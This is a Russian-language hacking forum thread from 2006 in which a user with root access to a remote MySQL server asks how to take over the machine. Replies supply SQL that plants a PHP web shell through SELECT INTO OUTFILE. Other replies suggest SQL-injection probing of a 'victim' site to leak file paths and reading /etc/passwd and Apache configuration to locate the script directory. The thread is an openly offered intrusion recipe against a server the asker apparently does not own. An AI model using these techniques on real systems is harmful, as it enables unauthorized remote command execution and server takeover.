HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ПРОГРАММИРОВАНИЕ > PHP
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Зашёл удолёно на MySql под root. Подскажите как захватить сервак.
  #1  
Старый 04.06.2006, 00:50
faust45
Познающий
Регистрация: 02.03.2006
Сообщений: 43
С нами: 10626930

Репутация: 0
По умолчанию Зашёл удолёно на MySql под root. Подскажите как захватить сервак.

Я думал скрипт залить но как я потом его вызову ?
Думал может в таблицы какието файлы по заливать а потом почитать их но как
заливать данные из таблиц
Помогите пожалуйста.
 
Ответить с цитированием

  #2  
Старый 04.06.2006, 00:53
Desr0w
Постоянный
Регистрация: 01.02.2006
Сообщений: 523
С нами: 10669286

Репутация: 319


По умолчанию

CREATE TABLE `shell` (s TEXT);
INSERT INTO `shell` values ('<? passthru("$cmd"); ?>');
SELECT `s` INTO OUTFILE '/svoi/puti/k/saity/shell.php' FROM `shell`;
DROP TABLE `shell`;
 
Ответить с цитированием

  #3  
Старый 04.06.2006, 01:02
faust45
Познающий
Регистрация: 02.03.2006
Сообщений: 43
С нами: 10626930

Репутация: 0
По умолчанию

ето ты конечно ловко придумал:
SELECT `s` INTO OUTFILE '/svoi/puti/k/saity/shell.php' FROM `shell`;

только вот как узнать полные пути к катологам в которых разрешено выполнение скриптов?
 
Ответить с цитированием

  #4  
Старый 04.06.2006, 05:24
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
С нами: 11200586

Репутация: 1398


По умолчанию

Попробуй на самом серваке скрипты пощупать. Может удача улыбнёться и ты увидишь северный путь :d
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием

  #5  
Старый 04.06.2006, 05:38
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
С нами: 11200586

Репутация: 1398


По умолчанию

У меян короче такой же косяк. Я короче путь знаю всё когда прописываю выдаёт следующее "You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '; INSERT INTO `shell` values (''); SEL". Я в скулях особо не разбираюсь но скажите мне что за ошибка?
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием

  #6  
Старый 04.06.2006, 09:48
K[o]S
Новичок
Регистрация: 29.07.2005
Сообщений: 20
С нами: 10938305

Репутация: 13
По умолчанию

Цитата:
Сообщение от SanyaX  
У меян короче такой же косяк. Я короче путь знаю всё когда прописываю выдаёт следующее "You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '; INSERT INTO `shell` values (''); SEL". Я в скулях особо не разбираюсь но скажите мне что за ошибка?
INSERT INTO `shell` values ('<? passthru("$cmd"); ?>');
замени на
INSERT INTO `s` values ('<? passthru("$cmd"); ?>');
 
Ответить с цитированием

  #7  
Старый 04.06.2006, 10:45
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
С нами: 11200586

Репутация: 1398


По умолчанию

Цитата:
Сообщение от K[o]S  
INSERT INTO `shell` values ('<? passthru("$cmd"); ?>');
замени на
INSERT INTO `s` values ('<? passthru("$cmd"); ?>');
А разницы? лучше не стало такая же ошибка. Использую скрипт от rst.
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием

  #8  
Старый 04.06.2006, 05:38
Desr0w
Постоянный
Регистрация: 01.02.2006
Сообщений: 523
С нами: 10669286

Репутация: 319


По умолчанию

victim.ru/check.php=into
Это просто глупый пример,попробуй вместо into подставить ' ,если будет ошибка узнаешь часть серв. пути.
victim.ru/check.php='
 
Ответить с цитированием

  #9  
Старый 04.06.2006, 10:49
Trinux
Познавший АНТИЧАТ
Регистрация: 26.11.2004
Сообщений: 1,149
С нами: 11291306

Репутация: 569


По умолчанию

2 SanyaX
версия твоего мускуля не поддерживает выполнение нескольких sql запросов через ; вот и все... насколько я понимаю
 
Ответить с цитированием

  #10  
Старый 04.06.2006, 11:44
ZaCo
Banned
Регистрация: 20.06.2005
Сообщений: 880
С нами: 10994966

Репутация: 1332


По умолчанию

ну можно например из /etc/passwd узнать путь к апачу. оттуда по всем извесным относительным путям conf/httpd.conf узнаешь путь к директории со скриптами. санякс пока ни одна версия мускля не обрабатывает запрос после ; по-крайней мере пхп библиотека для работы с мускл сервером за один mysql_query этого не позволяет.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Помогите откомпилить!! LoFFi Уязвимости 19 19.03.2006 22:56



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.